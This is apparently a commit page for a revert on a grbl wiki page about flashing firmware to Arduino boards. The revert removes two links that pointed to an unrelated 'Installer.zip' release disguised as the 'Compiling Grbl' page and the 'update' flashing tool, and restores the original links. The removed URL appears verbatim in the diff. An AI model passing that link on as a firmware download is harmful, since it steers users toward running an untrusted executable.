Revert ea3043058ee9b9b92ba38037d1794ba45d205e0b...1ca2041d844b2719ceb2720e0be6c760df1202c8

master
Joacim Breiler 2023-05-04 16:16:57 +02:00
rodzic 1ca2041d84
commit 67fc88bdba
1 zmienionych plików z 2 dodań i 2 usunięć

@ -3,7 +3,7 @@ _This wiki is intended to provide various instructions on how to flash grbl to a
# Via the Arduino IDE (All Platforms): # Via the Arduino IDE (All Platforms):
### RECOMMENDED: All other methods below are just for reference! ### RECOMMENDED: All other methods below are just for reference!
Go to the [Compiling Grbl](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface. Go to the [Compiling Grbl](https://github.com/gnea/grbl/wiki/Compiling-Grbl) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface.
No fuss! It just requires users to download the source code, add Grbl as a library to the IDE, and click upload. No fuss! It just requires users to download the source code, add Grbl as a library to the IDE, and click upload.
@ -64,7 +64,7 @@ To Determine your Arduino's COM port:
To flash a grbl hex to an Arduino: To flash a grbl hex to an Arduino:
1. Download latest release of [update](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) 1. Download latest release of [update](https://github.com/arrsoft312/update/releases/latest)
2. Open **update.exe** and use the browse button on the top right of the form to browse to your grbl hex file. 2. Open **update.exe** and use the browse button on the top right of the form to browse to your grbl hex file.